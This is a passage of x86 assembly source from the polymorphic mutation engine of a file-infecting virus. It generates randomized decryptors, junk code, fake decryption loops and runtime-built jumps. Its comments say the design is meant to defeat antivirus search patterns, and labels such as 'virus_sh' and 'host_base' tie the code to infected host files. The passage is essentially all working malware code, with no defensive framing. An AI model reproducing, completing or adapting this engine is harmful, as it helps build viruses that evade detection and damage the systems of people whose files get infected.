loop_string: lodsb
cmp al,MAGIC_ENDSTR
je end_of_magic
cmp al,MAGIC_ENDKEY
je last_spell
xor ecx,ecx
mov cl,al
rep movsb
jmp short loop_string
last_spell: call copy_key
end_of_magic: mov al,0C3h
stosb
pop edi
ret

;============================================================================
;Copy encryption key into work buffer taking care about operand size
;============================================================================

copy_key: mov eax,dword ptr [ebp+fake_crypt_key]
movzx ecx,byte ptr [ebp+fake_oper_size]
loop_key: stosb
shr eax,08h
loop loop_key
ret

;============================================================================
;Generate decryptor action: Move index to next step
;============================================================================

;============================================================
;Get number of bytes to inc or dec the index reg
;============================================================

gen_next_step: movzx ecx,byte ptr [ebp+oper_size]

;============================================================
;Get number of bytes to update with this instruction
;============================================================

loop_update: mov eax,ecx
call get_rnd_range
inc eax

;============================================================
;Check direction
;============================================================

test byte ptr [ebp+build_flags],CRYPT_DIRECTION
jnz step_down

call do_step_up
jmp short next_update

step_down: call do_step_down

next_update: sub ecx,eax
call GenGarbageEx
jecxz end_update
jmp short loop_update
end_update: ret

;============================================================
;Move index_reg up
;============================================================

do_step_up: push eax

mov eax,NumIdxUp
call get_rnd_range
lea esi,dword ptr [ebp+tbl_idx_up+eax*04h]
lodsd
add eax,ebp
jmp eax

IdxUpWithADD: mov ax,0C081h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
stosd
ret

IdxUpWithSUB: mov ax,0E881h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
neg eax
stosd
neg eax
ret

IdxUpWithINC: mov al,40h
or al,byte ptr [ebp+index_mask]
stosb
pop eax
mov eax,000000001h
ret

IdxUpADDADD: call save_it_ADD
push eax
mov ax,0C081h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
sub eax,edx
neg eax
stosd
mov eax,edx
ret

IdxUpADDSUB: call save_it_ADD
push eax
mov ax,0E881h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
sub eax,edx
stosd
mov eax,edx
ret

IdxUpSUBSUB: call save_it_SUB
push eax
mov ax,0E881h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
add eax,edx
neg eax
stosd
mov eax,edx
ret

IdxUpSUBADD: call save_it_SUB
push eax
mov ax,0C081h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
add eax,edx
stosd
mov eax,edx
ret

;============================================================
;Move index_reg down
;============================================================

do_step_down: push eax

mov eax,NumIdxDown
call get_rnd_range
lea esi,dword ptr [ebp+tbl_idx_down+eax*04h]
lodsd
add eax,ebp
jmp eax

IdxDownWithADD: mov ax,0C081h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
neg eax
stosd
neg eax
ret

IdxDownWithSUB: mov ax,0E881h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
stosd
ret

IdxDownWithDEC: mov al,48h
or al,byte ptr [ebp+index_mask]
stosb
pop eax
mov eax,00000001h
ret

IdxDownADDADD: call save_it_ADD
push eax
mov ax,0C081h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
sub eax,edx
neg eax
stosd
mov eax,edx
ret

IdxDownADDSUB: call save_it_ADD
push eax
mov ax,0E881h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
sub eax,edx
neg eax
stosd
mov eax,edx
ret

IdxDownSUBSUB: call save_it_SUB
push eax
mov ax,0E881h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
add eax,edx
neg eax
stosd
mov eax,edx
ret

IdxDownSUBADD: call save_it_SUB
push eax
mov ax,0C081h
or ah,byte ptr [ebp+index_mask]
stosw
pop eax
pop edx
add eax,edx
neg eax
stosd
mov eax,edx
ret

save_it_ADD: call total_save_it
push edx
mov al,03h
stosw
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
call GenGarbageEx
pop eax
ret

save_it_SUB: call total_save_it
push edx
mov al,2Bh
stosw
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
call GenGarbageEx
pop eax
ret

total_save_it: call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
call get_rnd32
stosd
push eax
push ebx
call GenGarbageEx
pop ebx
mov ah,byte ptr [ebp+index_mask]
shl ah,03h
or ah,byte ptr [ebx+REG_MASK]
or ah,0C0h
pop edx
ret

;============================================================================
;Generate decryptor action: Next counter value
;============================================================================

;============================================================
;Check counter direction and update counter
;using a INC or DEC instruction
;============================================================

gen_next_ctr: test byte ptr [ebp+build_flags],CRYPT_CDIR
jnz upd_ctr_down
upd_ctr_up: call get_rnd32
and al,01h
jz CountUpINC

mov al,40h
jmp DoShitWithCtr

CountUpINC: mov al,40h
or al,byte ptr [ebp+counter_mask]
jmp short upd_ctr_ok

upd_ctr_down: call get_rnd32
and al,01h
jz CountUpDEC

mov al,48h
jmp DoShitWithCtr

CountUpDEC: mov al,48h
or al,byte ptr [ebp+counter_mask]
upd_ctr_ok: stosb
ret

DoShitWithCtr: push eax

call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov ah,byte ptr [ebx+REG_MASK]
shl ah,03h
or ah,byte ptr [ebp+counter_mask]
or ah,0C0h
mov al,8Bh
stosw
push ebx
call GenGarbageEx
pop ebx

pop eax
or al,byte ptr [ebx+REG_MASK]
stosb
push ebx
call GenGarbageEx
pop ebx
mov ah,byte ptr [ebp+counter_mask]
shl ah,03h
or ah,byte ptr [ebx+REG_MASK]
or ah,0C0h
mov al,8Bh
stosw
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
ret

;============================================================================
;Generate decryptor action: Loop
;============================================================================

;============================================================
;Use counter reg in CMP instruction?
;============================================================

gen_loop: test byte ptr [ebp+build_flags],CRYPT_CMPCTR
jnz doloopauxreg

;============================================================
;Generate CMP counter_reg,end_value
;============================================================

mov ax,0F881h
or ah,byte ptr [ebp+counter_mask]
stosw
mov eax,dword ptr [ebp+end_value]
stosd
jmp doloopready

;============================================================
;Get a random valid register to use in a CMP instruction
;============================================================

doloopauxreg: call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

;============================================================
;Move index reg value into aux reg
;============================================================

mov ah,byte ptr [ebx+REG_MASK]
shl ah,03h
or ah,byte ptr [ebp+counter_mask]
or ah,0C0h
mov al,8Bh
stosw

;============================================================
;Guess what!?
;============================================================

push ebx
call GenGarbageEx
pop ebx

call get_rnd32
and al,03h
or al,al
jz loop_use_cmp
test al,02h
jz loop_use_sub

;============================================================
;Generate ADD aux_reg,-end_value
;============================================================

loop_use_add: mov ax,0C081h
or ah,byte ptr [ebx+REG_MASK]
stosw
mov eax,dword ptr [ebp+end_value]
neg eax
stosd
jmp short done_loop_use

;============================================================
;Generate CMP aux_reg,end_value
;============================================================

loop_use_cmp: mov ax,0F881h
jmp short loop_mask_here

;============================================================
;Generate SUB aux_reg,end_value
;============================================================

loop_use_sub: mov eax,0E881h
loop_mask_here: or ah,byte ptr [ebx+REG_MASK]
stosw
mov eax,dword ptr [ebp+end_value]
stosd

;============================================================
;Restore aux reg state
;============================================================

done_loop_use: xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

;============================================================
;Generate conditional jump
;============================================================

doloopready: mov eax,NumExitLoop
call get_rnd_range
lea esi,dword ptr [ebp+TblExitLoop+eax*04h]
lodsd
add eax,ebp
jmp eax

TblExitLoop equ $

dd offset doloopup
dd offset doloopdown
dd offset doloopmix

NumExitLoop equ ($-TblExitLoop)/04h

;============================================================
;Generate the following structure:
;
; loop_point:
; ...
; jnz loop_point
; ...
; jmp decrypted-code
;============================================================

doloopup: mov dword ptr [ebp+condition_ptr],edi
mov ax,850Fh
stosw
mov eax,dword ptr [ebp+loop_point]
sub eax,edi
sub eax,00000004h
stosd
call GenGarbageEx

mov esi,dword ptr [ebp+PtrToEP]
call DoComplexCmp
jmp CreateFog

;============================================================
;...or this one:
;
; loop_point:
; ...
; jz decrypted-code
; ...
; jmp loop_point
; ...
;============================================================

doloopdown: mov dword ptr [ebp+condition_ptr],edi
mov ax,840Fh
stosw
mov eax,dword ptr [ebp+PtrToEP]

sub eax,edi
sub eax,00000004h
stosd
call GenGarbageEx

mov esi,dword ptr [ebp+loop_point]
call DoComplexCmp
jmp CreateFog

;============================================================
;Generate the following structure:
;
; loop_point:
; ...
; jnz auxdest
; ...
; jmp decrypted-code
; ...
; auxdest:
; ...
; jmp loop_point
;============================================================

doloopmix: mov dword ptr [ebp+condition_ptr],edi
mov ax,850Fh
stosw
push edi
stosd
call GenGarbageEx
mov esi,dword ptr [ebp+PtrToEP]
call DoComplexCmp
call GenGarbageEx
pop edx
mov eax,edi
sub eax,00000004h
sub eax,edx
mov dword ptr [edx],eax
call GenGarbageEx
mov esi,dword ptr [ebp+loop_point]
call DoComplexCmp

;============================================================
;I notice some AV was using the JZ/JNZ instruction at the
;end of the decryptor in a search pattern... So now im going
;to build it at runtime (sometimes...)
;============================================================

CreateFog: test byte ptr [ebp+build_flags],CRYPT_FOG
jz NoFogRet

mov eax,NumFog
call get_rnd_range
lea esi,dword ptr [ebp+TblDoFog+eax*04h]
lodsd
add eax,ebp
call eax

mov eax,NumFixFog
call get_rnd_range
lea esi,dword ptr [ebp+TblFixFog+eax*04h]
lodsd
mov esi,dword ptr [ebp+condition_ptr]
add eax,ebp
call eax

NoFogRet: ret

;============================================================================
;Prepare pointer to memory into fog block, using ADD
;============================================================================

DoFogAdd: call FogStart
sub eax,dword ptr [ebp+Xrnd1]
push edi
push eax
mov ebx,dword ptr [ebp+XrndReg]
mov edi,dword ptr [ebp+XrndFixPtr]
mov ax,0C081h
or ah,byte ptr [ebx+REG_MASK]
stosw
pop eax
stosd
pop edi
ret

FixFogAdd: push edi
mov edi,dword ptr [ebp+XrndMath]
mov al,81h
mov ah,byte ptr [ebx+REG_MASK]
stosw
call get_rnd32
stosd
sub dword ptr [esi],eax
pop edi
ret

;============================================================================
;Prepare pointer to memory into fog block, using SUB
;============================================================================

DoFogSub: call FogStart
neg eax
add eax,dword ptr [ebp+Xrnd1]
push edi
push eax
mov ebx,dword ptr [ebp+XrndReg]
mov edi,dword ptr [ebp+XrndFixPtr]
mov ax,0E881h
or ah,byte ptr [ebx+REG_MASK]
stosw
pop eax
stosd
pop edi
ret

FixFogSub: push edi
mov edi,dword ptr [ebp+XrndMath]
mov ax,2881h
or ah,byte ptr [ebx+REG_MASK]
stosw
call get_rnd32
stosd
add dword ptr [esi],eax
pop edi
ret

;============================================================================
;Prepare pointer to memory into fog block, using XOR
;============================================================================

DoFogXor: call FogStart
xor eax,dword ptr [ebp+Xrnd1]
push edi
push eax
mov ebx,dword ptr [ebp+XrndReg]
mov edi,dword ptr [ebp+XrndFixPtr]
mov ax,0F081h
or ah,byte ptr [ebx+REG_MASK]
stosw
pop eax
stosd
pop edi
ret

FixFogXor: push edi
mov edi,dword ptr [ebp+XrndMath]
mov ax,3081h
or ah,byte ptr [ebx+REG_MASK]
stosw
call get_rnd32
stosd
xor dword ptr [esi],eax
pop edi
ret

;============================================================================
;Setup fog block
;============================================================================

FogStart: mov esi,dword ptr [ebp+condition_ptr]
mov eax,esi
call FromPoly2Rva
ret

;============================================================================
;Convert a given value in the poly decryptor to its future RVA
;
;On entry:
; eax -> Value to convert
;On exit:
; eax -> Converted value
;============================================================================

FromPoly2Rva: push edx
sub eax,dword ptr [ebp+map_is_here]
add eax,dword ptr [ebp+host_base]
mov edx,dword ptr [ebp+virus_sh]
sub eax,dword ptr [edx+SH_PointerToRawData]
add eax,dword ptr [edx+SH_VirtualAddress]
pop edx
ret

;============================================================================
;Produce complex end determination
;
;On entry:
; esi -> PtrToEP or loop_point
;============================================================================

DoComplexCmp: call get_rnd32
and al,01h
jz JmpEndJmpReg

;============================================================
;Go using JMP imm
;============================================================

JmpEndJmpImm: mov al,0E9h
stosb
mov eax,esi
sub eax,edi
sub eax,00000004h
stosd
ret

;============================================================
;Go using complex escheme
;============================================================

JmpEndJmpReg: push esi

call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
call get_rnd32
stosd
push eax
push ebx
call GenGarbageEx

mov eax,NumJmpEnd
call get_rnd_range
lea esi,dword ptr [ebp+tbl_jmp_end+eax*04h]
lodsd
add eax,ebp

pop ebx
pop edx
pop esi

call eax

push ebx
call GenGarbageEx
pop ebx

call get_rnd32
and al,01h
jz EndUseJmpReg

EndUsePushRet: mov al,50h
or al,byte ptr [ebx+REG_MASK]
stosb
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
call GenGarbageEx
call gen_ret
ret

EndUseJmpReg: mov ax,0E0FFh
or ah,byte ptr [ebx+REG_MASK]
stosw
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
ret

;============================================================================
;Complex end using ADD
;============================================================================

jmpendregadd: mov ax,0C081h
or ah,byte ptr [ebx+REG_MASK]
stosw
call ExtendedEnd
sub eax,edx
stosd
ret

;============================================================================
;Complex end using SUB
;============================================================================

jmpendregsub: mov ax,0E881h
or ah,byte ptr [ebx+REG_MASK]
stosw
call ExtendedEnd
sub eax,edx
neg eax
stosd
ret

;============================================================================
;Complex end using XOR
;============================================================================

jmpendregxor: mov ax,0F081h
or ah,byte ptr [ebx+REG_MASK]
stosw
call ExtendedEnd
xor eax,edx
stosd
ret

;============================================================================
;Complex fixed address
;============================================================================

ExtendedEnd: mov eax,esi
call FromPoly2Rva
ret

;============================================================================
;Generate init garbage
;============================================================================

GenInitGarbage: mov eax,00000005h
call get_rnd_range
or eax,eax
jz ExitInitGarbage

mov ecx,eax
loop_g_i_g: push ecx

mov eax,(end_i_g-tbl_i_g)/04h
call get_rnd_range

lea esi,dword ptr [ebp+tbl_i_g+eax*04h]
lodsd
add eax,ebp
call eax

pop ecx
loop loop_g_i_g

ExitInitGarbage:ret

;============================================================================
;Generate some garbage code
;============================================================================

GenGarbageEx: mov eax,00000004h
jmp short GoDirectToHell
gen_garbage: mov eax,00000002h
GoDirectToHell: push ecx
push esi
inc byte ptr [ebp+recursive_level]

call get_rnd_range
inc eax
inc eax
mov ecx,eax
loop_garbage: push ecx
mov eax,(end_garbage-tbl_garbage)/04h

cmp byte ptr [ebp+recursive_level],06h
jae too_much_shit

cmp byte ptr [ebp+recursive_level],02h
jb ok_gen_num

mov eax,(save_space-tbl_garbage)/04h

ok_gen_num: call get_rnd_range
lea esi,dword ptr [ebp+tbl_garbage+eax*04h]
lodsd
add eax,ebp
call eax
too_much_shit: pop ecx
loop loop_garbage

;============================================================
;Update recursive level
;============================================================

exit_gg: dec byte ptr [ebp+recursive_level]
pop esi
pop ecx
ret

;============================================================================
;Generate MOV reg,imm
;============================================================================

;============================================================
;Generate MOV reg32,imm
;============================================================

g_movreg32imm: call get_valid_reg
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
call get_rnd32
stosd
ret

;============================================================
;Generate MOV reg16,imm
;============================================================

g_movreg16imm: call get_valid_reg
mov ax,0B866h
or ah,byte ptr [ebx+REG_MASK]
stosw
call get_rnd32
stosw
ret

;============================================================
;Generate MOV reg8,imm
;============================================================

g_movreg8imm: call get_valid_reg
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
jnz a_movreg8imm
call get_rnd32
mov al,0B0h
or al,byte ptr [ebx+REG_MASK]
push eax
call get_rnd32
pop edx
and ax,0004h
or ax,dx
stosw
a_movreg8imm: ret

;============================================================================
;Generate mov reg,reg
;============================================================================

g_movregreg32: call get_rnd_reg
push ebx
call get_valid_reg
pop edx
cmp ebx,edx
je a_movregreg32
c_movregreg32: mov al,8Bh
h_movregreg32: mov ah,byte ptr [ebx+REG_MASK]
shl ah,03h
or ah,byte ptr [edx+REG_MASK]
or ah,0C0h
stosw
a_movregreg32: ret

g_movregreg16: call get_rnd_reg
push ebx
call get_valid_reg
pop edx
cmp ebx,edx
je a_movregreg32
mov al,66h
stosb
jmp short c_movregreg32

g_movregreg8: call get_rnd_reg
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
jnz a_movregreg8
push ebx
call get_valid_reg
pop edx
mov al,8Ah
h_movregreg8: test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
jnz a_movregreg8
cmp ebx,edx
je a_movregreg8
mov ah,byte ptr [ebx+REG_MASK]
shl ah,03h
or ah,byte ptr [edx+REG_MASK]
or ah,0C0h
push eax
call get_rnd32
pop edx
and ax,2400h
or ax,dx
stosw
a_movregreg8: ret

;============================================================================
;Generate xchg reg,reg
;============================================================================

g_xchgregreg32: call get_valid_reg
push ebx
call get_valid_reg
pop edx
cmp ebx,edx
je a_movregreg32
h_xchgregreg32: mov al,87h
jmp h_movregreg32

g_xchgregreg16: call get_valid_reg
push ebx
call get_valid_reg
pop edx
cmp ebx,edx
je a_movregreg32
mov al,66h
stosb
jmp short h_xchgregreg32

g_xchgregreg8: call get_valid_reg
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
jnz a_movregreg8
push ebx
call get_valid_reg
pop edx
mov al,86h
jmp h_movregreg8

;============================================================================
;Generate MOVZX/MOVSX reg32,reg16
;============================================================================

g_movzx_movsx: call get_rnd32
mov ah,0B7h
and al,01h
jz d_movzx
mov ah,0BFh
d_movzx: mov al,0Fh
stosw
call get_rnd_reg
push ebx
call get_valid_reg
pop edx
mov al,byte ptr [ebx+REG_MASK]
shl al,03h
or al,0C0h
or al,byte ptr [edx+REG_MASK]
stosb
ret

;============================================================================
;Generate INC reg
;============================================================================

g_inc_reg32: call get_valid_reg
mov al,40h
or al,byte ptr [ebx+REG_MASK]
stosb
ret

g_inc_reg16: mov al,66h
stosb
jmp short g_inc_reg32

g_inc_reg8: call get_valid_reg
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
jnz a_inc_reg8
call get_rnd32
and ah,04h
or ah,byte ptr [ebx+REG_MASK]
or ah,0C0h
mov al,0FEh
stosw
a_inc_reg8: ret

;============================================================================
;Generate DEC reg
;============================================================================

g_dec_reg32: call get_valid_reg
mov al,48h
or al,byte ptr [ebx+REG_MASK]
stosb
ret

g_dec_reg16: mov al,66h
stosb
jmp short g_dec_reg32

g_dec_reg8: call get_valid_reg
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
jnz a_dec_reg8
call get_rnd32
and ah,04h
or ah,byte ptr [ebx+REG_MASK]
or ah,0C8h
mov al,0FEh
stosw
a_dec_reg8: ret

;============================================================================
;Generate ADD/SUB/XOR/OR/AND reg,imm
;============================================================================

g_mathregimm32: mov al,81h
stosb
call get_valid_reg
call do_math_work
stosd
ret

g_mathregimm16: mov ax,8166h
stosw
call get_valid_reg
call do_math_work
stosw
ret

g_mathregimm8: call get_valid_reg
test byte ptr [ebx+REG_FLAGS],REG_NO_8BIT
jnz a_math8
mov al,80h
stosb
call do_math_work
stosb
and ah,04h
or byte ptr [edi-00000002h],ah
a_math8: ret

do_math_work: mov eax,end_math_imm-tbl_math_imm
call get_rnd_range
lea esi,dword ptr [ebp+eax+tbl_math_imm]
lodsb
or al,byte ptr [ebx+REG_MASK]
stosb
call get_rnd32
ret

;============================================================================
;Generate decryption instructions (real or fake ones)
;============================================================================

;============================================================
;Check if we are going to use a displacement in the
;indexing mode
;============================================================

fake_or_not: mov eax,dword ptr [ebp+fake_ptr_disp]
or eax,eax
jnz more_complex

;============================================================
;Choose generator for [reg] indexing mode
;============================================================

mov edx,offset tbl_idx_reg
call choose_magic
jmp you_got_it

;============================================================
;More fun?!?!
;============================================================

more_complex: mov al,byte ptr [ebp+fake_build_flags]
test al,CRYPT_SIMPLEX
jnz crypt_xtended

;============================================================
;Choose generator for [reg+imm] indexing mode
;============================================================

mov edx,offset tbl_dis_reg
call choose_magic

;============================================================
;Use magic to convert some values into
;desired instructions
;============================================================

you_got_it: call size_correct
mov dl,byte ptr [ebp+fake_index_mask]
lodsb
or al,al
jnz adn_reg_01
cmp dl,00000101b
je adn_reg_02
adn_reg_01: lodsb
or al,dl
stosb
jmp common_part
adn_reg_02: lodsb
add al,45h
xor ah,ah
stosw
jmp common_part

;============================================================
;Choose [reg+reg] or [reg+reg+disp]
;============================================================

crypt_xtended: xor eax,eax
mov dword ptr [ebp+disp2disp],eax ;Clear disp-over-disp

test al,CRYPT_COMPLEX
jz ok_complex

;============================================================
;Get random displacement from current displacement
;eeehh?!?
;============================================================

mov eax,00001000h
call get_rnd_range
mov dword ptr [ebp+disp2disp],eax
call load_aux

push ebx

call GenGarbageEx

;============================================================
;Choose generator for [reg+reg+imm] indexing mode
;============================================================

mov edx,offset tbl_paranoia
call choose_magic
jmp short done_xtended

ok_complex: mov eax,dword ptr [ebp+fake_ptr_disp]
call load_aux

push ebx

call GenGarbageEx

;============================================================
;Choose generator for [reg+reg] indexing mode
;============================================================

mov edx,offset tbl_xtended
call choose_magic

;============================================================
;Build decryptor instructions
;============================================================

done_xtended: call size_correct

pop ebx

mov dl,byte ptr [ebp+fake_index_mask]
lodsb
mov cl,al
or al,al
jnz arn_reg_01
cmp dl,00000101b
jne arn_reg_01
lodsb
add al,40h
stosb
jmp short arn_reg_02
arn_reg_01: movsb
arn_reg_02: mov al,byte ptr [ebx+REG_MASK]
shl al,03h
or al,dl
stosb
or cl,cl
jnz arn_reg_03
cmp dl,00000101b
jne arn_reg_03
xor al,al
stosb

;============================================================
;Restore aux reg state
;============================================================

arn_reg_03: xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

;============================================================
;Get post-build flags
;============================================================

common_part: lodsb

;============================================================
;Insert displacement from real address?
;============================================================

test al,MAGIC_PUTDISP
jz skip_disp
push eax
mov eax,dword ptr [ebp+fake_ptr_disp]
sub eax,dword ptr [ebp+disp2disp]
neg eax
stosd
pop eax

;============================================================
;Insert key?
;============================================================

skip_disp: test al,MAGIC_PUTKEY
jz skip_key
call copy_key

skip_key: ret

;============================================================================
;Choose a magic generator
;============================================================================

choose_magic: mov eax,00000006h
call get_rnd_range
add edx,ebp
lea esi,dword ptr [edx+eax*04h]
lodsd
add eax,ebp
mov esi,eax
ret

;============================================================================
;Do operand size correction
;============================================================================

size_correct: lodsb
mov ah,byte ptr [ebp+fake_oper_size]
cmp ah,01h
je store_correct
inc al
cmp ah,04h
je store_correct
mov ah,66h
xchg ah,al
stosw
ret
store_correct: stosb
ret

;============================================================================
;Load aux reg with displacement
;============================================================================

;============================================================
;Get a valid auxiliary register
;============================================================

load_aux: push eax
call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY

;============================================================
;Move displacement into aux reg
;============================================================

mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
pop eax
neg eax
stosd
ret

;============================================================================
;Generate push reg + garbage + pop reg
;============================================================================

g_push_g_pop: call gen_garbage

call get_rnd32
test al,01h
jnz skip_sp_push

call push_with_sp
jmp short from_push

skip_sp_push: call get_rnd_reg
mov al,50h
or al,byte ptr [ebx+REG_MASK]
stosb
call gen_garbage

from_push: call get_rnd32
test al,01h
jz pop_with_sp

call get_valid_reg
mov al,58h
or al,byte ptr [ebx+REG_MASK]
stosb

call gen_garbage
ret

;============================================================================
;Emulate a PUSH instruction, using SUB ESP,00000004h
;============================================================================

push_with_sp: mov eax,0004EC83h
stosd
dec edi
call GenGarbageEx
ret

;============================================================================
;Emulate a POP instruction, using ADD ESP,00000004h
;============================================================================

pop_with_sp: mov eax,0004C483h
stosd
dec edi
call GenGarbageEx
ret

;============================================================================
;Generate RET in different ways
;============================================================================

gen_ret: call get_rnd32
and al,01h
jnz just_ret

call get_valid_reg
mov al,58h
or al,byte ptr [ebx+REG_MASK]
stosb
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
push ebx
call GenGarbageEx
pop ebx
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov ax,0E0FFh
or ah,byte ptr [ebx+REG_MASK]
stosw
ret

just_ret: mov al,0C3h
stosb
ret

;============================================================================
;Generate CALL without return
;============================================================================

g_call_cont: mov al,0E8h
stosb
push edi
stosd
call gen_rnd_block
pop edx
mov eax,edi
sub eax,edx
sub eax,00000004h
mov dword ptr [edx],eax
call GenGarbageEx

call get_rnd32
test al,01h
jz pop_with_sp

call get_valid_reg
mov al,58h
or al,byte ptr [ebx+REG_MASK]
stosb

call gen_garbage
ret

;============================================================================
;Generate unconditional jumps
;============================================================================

g_jump_u: mov al,0E9h
stosb
push edi
stosd
call gen_rnd_block
pop edx
mov eax,edi
sub eax,edx
sub eax,00000004h
mov dword ptr [edx],eax
call GenGarbageEx
ret

g_save_jump: mov al,0E9h
stosb
push edi
stosd
call gen_rnd_block
pop edx
mov eax,edi
sub eax,edx
sub eax,00000004h
mov dword ptr [edx],eax
ret

;============================================================================
;Generate conditional jumps
;============================================================================

g_jump_c: call get_rnd32
and ah,0Fh
add ah,80h
mov al,0Fh
stosw
push edi
stosd
call GenGarbageEx
pop edx
mov eax,edi
sub eax,edx
sub eax,00000004h
mov dword ptr [edx],eax
call GenGarbageEx
ret

g_save_jump_c: call get_rnd32
and ah,0Fh
add ah,80h
mov al,0Fh
stosw
xor eax,eax
stosd
ret

;============================================================================
;Generate MOV [mem],reg
;============================================================================

gen_mov_mem8: mov dl,88h
jmp mem8wr
gen_mov_mem16: mov al,66h
stosb
gen_mov_mem32: mov dl,89h
jmp gen_mem_wr

gen_add_mem8: mov dl,00h
jmp mem8wr
gen_add_mem16: mov al,66h
stosb
gen_add_mem32: mov dl,01h
jmp gen_mem_wr

gen_sub_mem8: mov dl,28h
jmp mem8wr
gen_sub_mem16: mov al,66h
stosb
gen_sub_mem32: mov dl,29h
jmp gen_mem_wr

gen_adc_mem8: mov dl,10h
jmp mem8wr
gen_adc_mem16: mov al,66h
stosb
gen_adc_mem32: mov dl,11h
jmp gen_mem_wr

gen_sbb_mem8: mov dl,18h
jmp mem8wr
gen_sbb_mem16: mov al,66h
stosb
gen_sbb_mem32: mov dl,19h
jmp gen_mem_wr

gen_or_mem8: mov dl,08h
jmp mem8wr
gen_or_mem16: mov al,66h
stosb
gen_or_mem32: mov dl,09h
jmp gen_mem_wr

gen_and_mem8: mov dl,20h
jmp mem8wr
gen_and_mem16: mov al,66h
stosb
gen_and_mem32: mov dl,21h
jmp gen_mem_wr

gen_xor_mem8: mov dl,30h
jmp mem8wr
gen_xor_mem16: mov al,66h
stosb
gen_xor_mem32: mov dl,31h
jmp gen_mem_wr

mem8wr: call gen_mem_wr
call get_rnd32
and al,20h
or byte ptr [edi-00000005h],al
ret

gen_mem_wr: call get_rnd_reg
mov ah,byte ptr [ebx+REG_MASK]
or ah,ah
jnz skip_wr_eax
cmp dl,88h
je gen_mem_wr
cmp dl,89h
je gen_mem_wr

skip_wr_eax: shl ah,03h
or ah,05h
mov al,dl
stosw

movzx eax,byte ptr [ebp+NumberOfDataAreas]
call get_rnd_range
lea esi,dword ptr [ebp+tbl_data_area+eax*08h]
lodsd
push eax
lodsd
sub eax,00000004h
call get_rnd_range
pop edx
add eax,edx
stosd

ret

;============================================================================
;Generate clc/stc/cmc/cld/std
;============================================================================

gen_save_code: mov eax,end_save_code-tbl_save_code
call get_rnd_range
mov al,byte ptr [ebp+tbl_save_code+eax]
stosb
ret

;============================================================================
;Generate fake decrypt instructions
;============================================================================

gen_fake_crypt: cmp byte ptr [ebp+recursive_level],03h
jae bad_fake_size

cmp byte ptr [ebp+NumberOfDataAreas],02h
jb bad_fake_size

push dword ptr [ebp+fake_ptr_disp]
push dword ptr [ebp+fake_crypt_key]
mov dl,byte ptr [ebp+fake_build_flags]
mov dh,byte ptr [ebp+fake_index_mask]
shl edx,08h
mov dl,byte ptr [ebp+fake_oper_size]
push edx

call get_rnd32 ;Get encryption key
mov dword ptr [ebp+fake_crypt_key],eax
call get_rnd32 ;Get generation flags
mov byte ptr [ebp+fake_build_flags],al

call get_rnd32 ;Get size of mem operand
and al,03h
cmp al,01h
je ok_fake_size
cmp al,02h
je ok_fake_size
inc al
ok_fake_size: mov byte ptr [ebp+fake_oper_size],al

call get_rnd32 ;Choose displacement
and eax,00000001h
jz ok_fake_disp

call get_rnd32
call get_rnd_range
inc eax
neg eax
ok_fake_disp: mov dword ptr [ebp+fake_ptr_disp],eax

movzx eax,byte ptr [ebp+NumberOfDataAreas]
call get_rnd_range
lea esi,dword ptr [ebp+tbl_data_area+eax*08h]
lodsd
add eax,dword ptr [ebp+fake_ptr_disp]
push eax
lodsd
sub eax,00000004h
call get_rnd_range

pop edx
add eax,edx
push eax

call get_valid_reg

or byte ptr [ebx+REG_FLAGS],REG_IS_INDEX
mov al,byte ptr [ebx+REG_MASK]
mov byte ptr [ebp+fake_index_mask],al
or al,0B8h
stosb
pop eax
stosd

push ebx
call GenGarbageEx ;Garbage
call fake_or_not
call GenGarbageEx ;Garbage
pop ebx

xor byte ptr [ebx+REG_FLAGS],REG_IS_INDEX

pop eax
mov byte ptr [ebp+fake_oper_size],al
shr eax,08h
mov byte ptr [ebp+fake_index_mask],ah
mov byte ptr [ebp+fake_build_flags],al
pop dword ptr [ebp+fake_crypt_key]
pop dword ptr [ebp+fake_ptr_disp]
bad_fake_size: ret

;============================================================================
;Get a ramdom reg
;============================================================================

get_rnd_reg: mov eax,00000007h
call get_rnd_range
lea ebx,dword ptr [ebp+tbl_regs+eax*02h]
ret

;============================================================================
;Get a ramdom reg (avoid REG_READ_ONLY, REG_IS_COUNTER and REG_IS_INDEX)
;============================================================================

get_valid_reg: call get_rnd_reg
mov al,byte ptr [ebx+REG_FLAGS]
and al,REG_IS_INDEX or REG_IS_COUNTER or REG_READ_ONLY
jnz get_valid_reg
ret

;============================================================================
;Load ecx with crypt_size / oper_size
;============================================================================

